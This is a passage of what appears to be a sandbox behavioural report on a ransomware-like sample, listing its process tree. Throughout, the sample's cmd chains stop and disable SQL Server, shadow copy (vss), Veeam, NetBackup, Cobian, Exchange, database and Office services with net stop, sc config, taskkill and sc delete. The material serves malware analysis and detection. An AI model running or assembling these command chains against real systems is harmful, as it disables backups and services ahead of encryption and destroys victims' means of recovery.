"MSSQL$WOLTERSKLUWER" start= disabled & sc config "SQLAgent$PROGID" start= disabled "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3736
  - - C:\Windows\SysWOW64\net.exe
      net stop "SQLSERVERAGENT"
      4⤵
      PID:3260
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "SQLSERVERAGENT"
        5⤵
        
        PID:1088
  - - C:\Windows\SysWOW64\net.exe
      net stop "SQLBrowser"
      4⤵
      PID:372
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "SQLBrowser"
        5⤵
        
        PID:2832
  - - C:\Windows\SysWOW64\net.exe
      net stop "SQLTELEMETRY"
      4⤵
      PID:1536
  - - C:\Windows\SysWOW64\net.exe
      net stop "MsDtsServer130"
      4⤵
      PID:3500
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "MsDtsServer130"
        5⤵
        
        PID:716
  - - C:\Windows\SysWOW64\net.exe
      net stop "SSISTELEMETRY130"
      4⤵
      PID:3860
  - - C:\Windows\SysWOW64\net.exe
      net stop "SQLWrite"
      4⤵
      PID:968
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "SQLWrite"
        5⤵
        
        PID:1984
  - - C:\Windows\SysWOW64\net.exe
      net stop "MSSQL$VEEAMSQL2012"
      4⤵
      PID:4392
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2012"
        5⤵
        
        PID:4452
  - - C:\Windows\SysWOW64\net.exe
      net stop "SQLAgent$VEEAMSQL2012"
      4⤵
      PID:4800
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2012"
        5⤵
        
        PID:4940
  - - C:\Windows\SysWOW64\net.exe
      net stop "MSSQL"
      4⤵
      PID:2032
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL"
        5⤵
        
        PID:3892
  - - C:\Windows\SysWOW64\net.exe
      net stop "SQLAgent"
      4⤵
      PID:4596
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent"
        5⤵
        
        PID:4936
  - - C:\Windows\SysWOW64\net.exe
      net stop "MSSQLServerADHelper100"
      4⤵
      PID:5000
  - - C:\Windows\SysWOW64\net.exe
      net stop "MSSQLServerOLAPService"
      4⤵
      PID:4452
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLServerOLAPService"
        5⤵
        
        PID:4684
  - - C:\Windows\SysWOW64\net.exe
      net stop "MsDtsServer100"
      4⤵
      PID:288
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "MsDtsServer100"
        5⤵
        
        PID:5056
  - - C:\Windows\SysWOW64\net.exe
      net stop "ReportServer"
      4⤵
      PID:1912
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "ReportServer"
        5⤵
        
        PID:4388
  - - C:\Windows\SysWOW64\net.exe
      net stop "TMBMServer"
      4⤵
      PID:1380
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "TMBMServer"
        5⤵
        
        PID:4116
  - - C:\Windows\SysWOW64\net.exe
      net stop "SQLTELEMETRY$HL"
      4⤵
      PID:4248
  - - C:\Windows\SysWOW64\net.exe
      net stop "MSSQL$PROGID"
      4⤵
      PID:4304
  - - C:\Windows\SysWOW64\net.exe
      net stop "MSSQL$WOLTERSKLUWER"
      4⤵
      PID:2744
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$WOLTERSKLUWER"
        5⤵
        
        PID:280
  - - C:\Windows\SysWOW64\net.exe
      net stop "SQLAgent$PROGID"
      4⤵
      PID:4232
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$PROGID"
        5⤵
        
        PID:308
  - - C:\Windows\SysWOW64\net.exe
      net stop "SQLAgent$WOLTERSKLUWER"
      4⤵
      PID:4808
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$WOLTERSKLUWER"
        5⤵
        
        PID:4804
  - - C:\Windows\SysWOW64\net.exe
      net stop "MSSQLFDLauncher$OPTIMA"
      4⤵
      PID:2204
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$OPTIMA"
        5⤵
        
        PID:4380
  - - C:\Windows\SysWOW64\net.exe
      net stop "MSSQL$OPTIMA"
      4⤵
      PID:1564
  - - C:\Windows\SysWOW64\net.exe
      net stop "SQLAgent$OPTIMA"
      4⤵
      PID:4708
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$OPTIMA"
        5⤵
        
        PID:4232
  - - C:\Windows\SysWOW64\net.exe
      net stop "ReportServer$OPTIMA"
      4⤵
      PID:5084
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "ReportServer$OPTIMA"
        5⤵
        
        PID:3612
  - - C:\Windows\SysWOW64\net.exe
      net stop "msftesql$SQLEXPRESS"
      4⤵
      PID:4760
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop iNethinkSQLBackupSvc
        5⤵
        
        PID:4680
  - - C:\Windows\SysWOW64\net.exe
      net stop "postgresql-x64-9.4"
      4⤵
      PID:4468
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "postgresql-x64-9.4"
        5⤵
        
        PID:1752
  - - C:\Windows\SysWOW64\sc.exe
      sc config "MSSQLFDLauncher" start= disabled
      4⤵
      PID:4148
  - - C:\Windows\SysWOW64\sc.exe
      sc config "SQLSERVERAGENT" start= disabled
      4⤵
      PID:3644
  - - C:\Windows\SysWOW64\sc.exe
      sc config "SQLTELEMETRY" start= disabled
      4⤵
      PID:4108
  - - C:\Windows\SysWOW64\sc.exe
      sc config "SQLBrowser" start= disabled
      4⤵
      PID:1380
  - - C:\Windows\SysWOW64\sc.exe
      sc config "MsDtsServer130" start= disabled
      4⤵
      PID:4396
  - - C:\Windows\SysWOW64\sc.exe
      sc config "SSISTELEMETRY130" start= disabled
      4⤵
      PID:4784
  - - C:\Windows\SysWOW64\sc.exe
      sc config "MSSQL$WOLTERSKLUWER" start= disabled
      4⤵
      PID:4392
  - - C:\Windows\SysWOW64\sc.exe
      sc config "SQLAgent$PROGID" start= disabled
      4⤵
      PID:4468
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & a & sc config "SQLWriter" start= disabled & sc config "MSSQL$VEEAMSQL2012" start= disabled & sc config "SQLAgent$VEEAMSQL2012" start= disabled & sc config "MSSQL" start= disabled & sc config "SQLAgent" start= disabled & sc config "MSSQLServerADHelper100" start= disabled & sc config "MSSQLServerOLAPService" start= disabled & sc config "MsDtsServer100" start= disabled & sc config "ReportServer" start= disabled & sc config "SQLTELEMETRY$HL" start= disabled & sc config "TMBMServer" start= disabled & sc config "MSSQL$PROGID" start= disabled"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2352
  - - C:\Windows\SysWOW64\sc.exe
      sc config "SQLWriter" start= disabled
      4⤵
      PID:2968
  - - C:\Windows\SysWOW64\sc.exe
      sc config "MSSQL$VEEAMSQL2012" start= disabled
      4⤵
      PID:1496
  - - C:\Windows\SysWOW64\sc.exe
      sc config "SQLAgent$VEEAMSQL2012" start= disabled
      4⤵
      PID:3860
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "SSISTELEMETRY130"
        5⤵
        
        PID:2668
  - - C:\Windows\SysWOW64\sc.exe
      sc config "MSSQL" start= disabled
      4⤵
      PID:2932
  - - C:\Windows\SysWOW64\sc.exe
      sc config "SQLAgent" start= disabled
      4⤵
      PID:1952
  - - C:\Windows\SysWOW64\sc.exe
      sc config "MSSQLServerADHelper100" start= disabled
      4⤵
      PID:2232
  - - C:\Windows\SysWOW64\sc.exe
      sc config "MSSQLServerOLAPService" start= disabled
      4⤵
      PID:2968
  - - C:\Windows\SysWOW64\sc.exe
      sc config "MsDtsServer100" start= disabled
      4⤵
      PID:612
  - - C:\Windows\SysWOW64\sc.exe
      sc config "ReportServer" start= disabled
      4⤵
      PID:724
  - - C:\Windows\SysWOW64\sc.exe
      sc config "SQLTELEMETRY$HL" start= disabled
      4⤵
      PID:1212
  - - C:\Windows\SysWOW64\sc.exe
      sc config "TMBMServer" start= disabled
      4⤵
      PID:3996
  - - C:\Windows\SysWOW64\sc.exe
      sc config "MSSQL$PROGID" start= disabled
      4⤵
      PID:304
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & taskkill /F /IM U8WorkerService.exe & taskkill /F /IM UFIDA.U8.ECE.UTU.Services.exe & taskkill /F /IM UFIDA.U8.UAP.ReportService.exe & taskkill /F /IM U8AllAuthServer.exe & taskkill /F /IM U8WebPool.exe & taskkill /F /IM U8TaskService.exe & taskkill /F /IM UFIDA.U8.Report.SLReportService.exe & taskkill /F /IM U8SCMPool.exe & taskkill /F /IM U8DispatchService.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2060
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM U8WorkerService.exe
      4⤵
      PID:4012
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM UFIDA.U8.ECE.UTU.Services.exe
      4⤵
      PID:308
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM UFIDA.U8.UAP.ReportService.exe
      4⤵
      PID:1620
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM U8AllAuthServer.exe
      4⤵
      Kills process with taskkill
      PID:4828
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM U8WebPool.exe
      4⤵
      PID:312
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM U8TaskService.exe
      4⤵
      PID:4792
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM UFIDA.U8.Report.SLReportService.exe
      4⤵
      PID:4856
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM U8SCMPool.exe
      4⤵
      PID:5008
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM U8DispatchService.exe
      4⤵
      PID:5004
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc config SQLSERVERAGENT start=disabled & net stop SQLBrowser & sc config SQLBrowser start=disabled & net stop vss & sc config vss start=disabled & net stop SQLWriter & sc config SQLWriter start=disabled & net stop vmvss & sc config vmvss start=disabled & sc config MSSQL$FE_EXPRESS start= disabled & net stop MSSQL$RE_EXPRESS & net stop SQLANYs_Sage_FAS_Fixed_Assets & sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled & net stop MSSQL$VIM_SQLEXP & sc config MSSQL$VIM_SQLEXP start=disabled & net stop "MSSQLFDLauncher" & net stop "MSSQLSERVER""
    3⤵
    PID:2948
  - - C:\Windows\SysWOW64\sc.exe
      sc config MSSQLSERVER start=disabled
      4⤵
      PID:2140
  - - C:\Windows\SysWOW64\sc.exe
      sc config "SQL Server (MSSQLSERVER)" start=disabled
      4⤵
      PID:1228
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQL$
      4⤵
      PID:416
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$
        5⤵
        
        PID:896
  - - C:\Windows\SysWOW64\sc.exe
      sc config MSSQL$ start=disabled
      4⤵
      PID:1740
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLSERVERAGENT
      4⤵
      PID:616
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLSERVERAGENT
        5⤵
        
        PID:736
  - - C:\Windows\SysWOW64\sc.exe
      sc config SQLSERVERAGENT start=disabled
      4⤵
      PID:2724
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLBrowser
      4⤵
      PID:896
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLBrowser
        5⤵
        
        PID:1604
  - - C:\Windows\SysWOW64\sc.exe
      sc config SQLBrowser start=disabled
      4⤵
      PID:1540
  - - C:\Windows\SysWOW64\net.exe
      net stop vss
      4⤵
      PID:372
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop vss
        5⤵
        
        PID:4248
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "SQLTELEMETRY$HL"
        6⤵
        
        PID:4504
  - - C:\Windows\SysWOW64\sc.exe
      sc config vss start=disabled
      4⤵
      PID:4140
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLWriter
      4⤵
      PID:1620
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLWriter
        5⤵
        
        PID:4232
  - - C:\Windows\SysWOW64\sc.exe
      sc config SQLWriter start=disabled
      4⤵
      PID:4588
  - - C:\Windows\SysWOW64\net.exe
      net stop vmvss
      4⤵
      PID:4868
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop vmvss
        5⤵
        
        PID:5044
  - - C:\Windows\SysWOW64\sc.exe
      sc config vmvss start=disabled
      4⤵
      PID:5024
  - - C:\Windows\SysWOW64\sc.exe
      sc config MSSQL$FE_EXPRESS start= disabled
      4⤵
      PID:2320
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQL$RE_EXPRESS
      4⤵
      PID:4636
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$RE_EXPRESS
        5⤵
        
        PID:5072
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLANYs_Sage_FAS_Fixed_Assets
      4⤵
      PID:2464
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLANYs_Sage_FAS_Fixed_Assets
        5⤵
        
        PID:4224
  - - C:\Windows\SysWOW64\sc.exe
      sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled
      4⤵
      PID:1544
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQL$VIM_SQLEXP
      4⤵
      PID:1712
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$VIM_SQLEXP
        5⤵
        
        PID:4996
  - - C:\Windows\SysWOW64\sc.exe
      sc config MSSQL$VIM_SQLEXP start=disabled
      4⤵
      PID:4940
  - - C:\Windows\SysWOW64\net.exe
      net stop "MSSQLFDLauncher"
      4⤵
      PID:1860
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher"
        5⤵
        
        PID:4332
  - - C:\Windows\SysWOW64\net.exe
      net stop "MSSQLSERVER"
      4⤵
      PID:2320
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLSERVER"
        5⤵
        
        PID:5012
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & a & taskkill /F /IM Veeam.Backup.Agent.ConfigurationService.exe & taskkill /F /IM Veeam.Backup.BrokerService.exe & taskkill /F /IM Veeam.Backup.CatalogDataService.exe & taskkill /F /IM Veeam.Backup.CloudService.exe & taskkill /F /IM Veeam.Backup.Manager.exe & taskkill /F /IM Veeam.Backup.MountService.exe & taskkill /F /IM Veeam.Backup.Service.exe & taskkill /F /IM Veeam.Backup.WmiServer.exe & taskkill /F /IM Veeam.Guest.Interaction.Proxy.exe & taskkill /F /IM VeeamDeploymentSvc.exe & taskkill /F /IM VeeamNFSSvc.exe & taskkill /F /IM VeeamTransportSvc.exe & taskkill /F /IM sqlbrowser.exe & taskkill /F /IM sqlceip.exe & taskkill /F /IM sqlservr.exe & taskkill /F /IM sqlwriter.exe & taskkill /F /IM sqlagentc.exe & taskkill /F /IM ReportingServicesService.exe & taskkill /F /IM Ssms.exe & taskkill /F /IM fdhost.exe & taskkill /F /IM fdlauncher.exe & taskkill /F /IM MsDtsSrvr.exe & taskkill /F /IM msmdsrv.exe & taskkill /F /IM mysql.exe & taskkill /F /IM mysqld.exe & taskkill /F /IM w3wp.exe & taskkill /F /IM wsusservice.exe & taskkill /F /IM SageCSClient.exe & taskkill /F /IM UFSoft.U8.OC.QuartzScheduler.exe & taskkill /F /IM Launchpad.exe & taskkill /F /IM dbsrv12.exe & taskkill /F /IM EXCEL.EXE & taskkill /F /IM OUTLOOK.EXE & taskkill /F /IM WINWORD.EXE & taskkill /F /IM OneDrive.exe & taskkill /F /IM TaskService.exe"
    3⤵
    PID:1836
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Veeam.Backup.Agent.ConfigurationService.exe
      4⤵
      PID:2828
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Veeam.Backup.BrokerService.exe
      4⤵
      PID:1812
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Veeam.Backup.CatalogDataService.exe
      4⤵
      PID:2844
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Veeam.Backup.CloudService.exe
      4⤵
      Kills process with taskkill
      PID:60
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Veeam.Backup.Manager.exe
      4⤵
      PID:4564
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Veeam.Backup.MountService.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4432
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Veeam.Backup.Service.exe
      4⤵
      PID:4724
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Veeam.Backup.WmiServer.exe
      4⤵
      PID:4536
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Veeam.Guest.Interaction.Proxy.exe
      4⤵
      PID:4572
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM VeeamDeploymentSvc.exe
      4⤵
      PID:724
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM VeeamNFSSvc.exe
      4⤵
      PID:2052
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM VeeamTransportSvc.exe
      4⤵
      Kills process with taskkill
      PID:2752
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM sqlbrowser.exe
      4⤵
      PID:4464
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM sqlceip.exe
      4⤵
      PID:4960
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM sqlservr.exe
      4⤵
      PID:4800
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM sqlwriter.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4724
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM sqlagentc.exe
      4⤵
      PID:4660
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM ReportingServicesService.exe
      4⤵
      Kills process with taskkill
      PID:4068
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Ssms.exe
      4⤵
      PID:4300
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM fdhost.exe
      4⤵
      PID:3688
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM fdlauncher.exe
      4⤵
      PID:1576
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM MsDtsSrvr.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4792
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msmdsrv.exe
      4⤵
      PID:4988
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM mysql.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4384
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM mysqld.exe
      4⤵
      Kills process with taskkill
      PID:4596
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM w3wp.exe
      4⤵
      PID:2952
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM wsusservice.exe
      4⤵
      PID:4068
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM SageCSClient.exe
      4⤵
      PID:4132
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM UFSoft.U8.OC.QuartzScheduler.exe
      4⤵
      PID:1596
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Launchpad.exe
      4⤵
      Kills process with taskkill
      PID:4100
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM dbsrv12.exe
      4⤵
      PID:5088
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM EXCEL.EXE
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2464
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM OUTLOOK.EXE
      4⤵
      PID:4824
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM WINWORD.EXE
      4⤵
      PID:4252
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM OneDrive.exe
      4⤵
      PID:3008
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM TaskService.exe
      4⤵
      PID:4504
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & a & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" & net stop "NetBackup Client Service" & net stop "NetBackup Discovery Framework" & net stop "NetBackup Legacy Client Service" & net stop "NetBackup Legacy Network Service" & net stop "NetBackup Proxy Service" & net stop "NetBackup SAN Client Fibre Transport Service" & taskkill /IM mysqld-nt.exe /F & taskkill /IM NFVPrint.exe /F & taskkill /IM licenceserver.exe /F & taskkill /IM Launchpad.exe /F & taskkill /F /IM "FileZilla Server.exe" & taskkill /F /IM cbService.exe & taskkill /F /IM cbInterface.exe & taskkill /F /IM pvxwin32.exe & taskkill /F /IM pvxwin64.exe & taskkill /F /IM pvxcom.exe & taskkill /F /IM pvxiosvr.exe & taskkill /F /IM Sage.NA.AT_AU.SysTray.exe & taskkill /F /IM Sage.NA.AT_AU.Service.exe"
    3⤵
    PID:1668
  - - C:\Windows\SysWOW64\net.exe
      net stop "MSOLAP$SHOPCONTROL9"
      4⤵
      PID:2592
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "MSOLAP$SHOPCONTROL9"
        5⤵
        
        PID:2816
  - - C:\Windows\SysWOW64\net.exe
      net stop "MSSQL$SHOPCONTROL9"
      4⤵
      PID:796
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$SHOPCONTROL9"
        5⤵
        
        PID:412
  - - C:\Windows\SysWOW64\net.exe
      net stop "MSSQLFDLauncher$SHOPCONTROL9"
      4⤵
      PID:3312
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$SHOPCONTROL9"
        5⤵
        
        PID:2952
  - - C:\Windows\SysWOW64\net.exe
      net stop "ReportServer$SHOPCONTROL9"
      4⤵
      PID:2220
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "ReportServer$SHOPCONTROL9"
        5⤵
        
        PID:1308
  - - C:\Windows\SysWOW64\net.exe
      net stop "SQLAgent$SHOPCONTROL9"
      4⤵
      PID:4144
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$SHOPCONTROL9"
        5⤵
        
        PID:4376
  - - C:\Windows\SysWOW64\net.exe
      net stop "NetBackup Client Service"
      4⤵
      PID:4792
  - - C:\Windows\SysWOW64\net.exe
      net stop "NetBackup Discovery Framework"
      4⤵
      PID:2704
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "NetBackup Discovery Framework"
        5⤵
        
        PID:4224
  - - C:\Windows\SysWOW64\net.exe
      net stop "NetBackup Legacy Client Service"
      4⤵
      PID:4668
  - - C:\Windows\SysWOW64\net.exe
      net stop "NetBackup Legacy Network Service"
      4⤵
      PID:5048
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "NetBackup Legacy Network Service"
        5⤵
        
        PID:5024
  - - C:\Windows\SysWOW64\net.exe
      net stop "NetBackup Proxy Service"
      4⤵
      PID:4632
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "NetBackup Proxy Service"
        5⤵
        
        PID:4612
  - - C:\Windows\SysWOW64\net.exe
      net stop "NetBackup SAN Client Fibre Transport Service"
      4⤵
      PID:5096
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "NetBackup SAN Client Fibre Transport Service"
        5⤵
        
        PID:2816
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM mysqld-nt.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5048
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM NFVPrint.exe /F
      4⤵
      PID:4752
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM licenceserver.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5112
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Launchpad.exe /F
      4⤵
      PID:4468
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM "FileZilla Server.exe"
      4⤵
      PID:4936
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM cbService.exe
      4⤵
      PID:4856
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM cbInterface.exe
      4⤵
      PID:3312
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM pvxwin32.exe
      4⤵
      Kills process with taskkill
      PID:4664
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM pvxwin64.exe
      4⤵
      PID:4924
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM pvxcom.exe
      4⤵
      PID:4768
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM pvxiosvr.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1812
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Sage.NA.AT_AU.SysTray.exe
      4⤵
      PID:4468
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Sage.NA.AT_AU.Service.exe
      4⤵
      PID:1284
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & a & @taskkill /IM Tomcat7w.exe /F & @taskkill /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F & @taskkill /IM UFSoft.U8.OC.QuartzScheduler.exe /F & @taskkill /IM Launchpad.exe /F & @taskkill /IM mpdwsvc.exe /F & @taskkill /IM cbVSCService11.exe /F & @taskkill /IM cbService.exe /F & @sc delete CobianBackup11 & @sc delete cbVSCService11 & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM "Kingdee.K3.CRM.MMC.AutoService.exe" /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM "Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe" /F & taskkill /F /IM store.exe & taskkill /F /IM MSExchangeMailboxReplication.exe & taskkill /F /IM Microsoft.Exchange.ProtectedServiceHost.exe & taskkill /F /IM MSExchangeThrottling.exe & taskkill /F /IM EdgeTransport.exe & taskkill /F /IM MSExchangeTransportLogSearch.exe & taskkill /F /IM Microsoft.Exchange.RpcClientAccess.Service.exe & taskkill /F /IM Microsoft.Exchange.AddressBook.Service.exe & taskkill /F /IM DataCollectorSvc.exe & taskkill /F /IM Microsoft.Exchange.ServiceHost.exe & taskkill /F /IM Microsoft.Exchange.ContentFilter.Wrapper.exe & taskkill /F /IM MSExchangeMailboxAssistants.exe & taskkill /F /IM msexchangerepl.exe & taskkill /F /IM Microsoft.Exchange.Search.ExSearch.exe & taskkill /F /IM Microsoft.Exchange.EdgeSyncSvc.exe & taskkill /F /IM MsExchangeFDS.exe & taskkill /F /IM MSExchangeMailSubmission.exe & taskkill /F /IM MSExchangeTransport.exe & taskkill /F /IM Microsoft.Exchange.AntispamUpdateSvc.exe"
    3⤵
    PID:2056
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Tomcat7w.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:980
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F
      4⤵
      PID:3532
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM UFSoft.U8.OC.QuartzScheduler.exe /F
      4⤵
      PID:3512
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Launchpad.exe /F
      4⤵
      PID:4972
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM mpdwsvc.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4952
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM cbVSCService11.exe /F
      4⤵
      PID:4972
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM cbService.exe /F
      4⤵
      PID:3440
  - - C:\Windows\SysWOW64\sc.exe
      sc delete CobianBackup11
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2828
  - - C:\Windows\SysWOW64\sc.exe
      sc delete cbVSCService11
      4⤵
      PID:5064
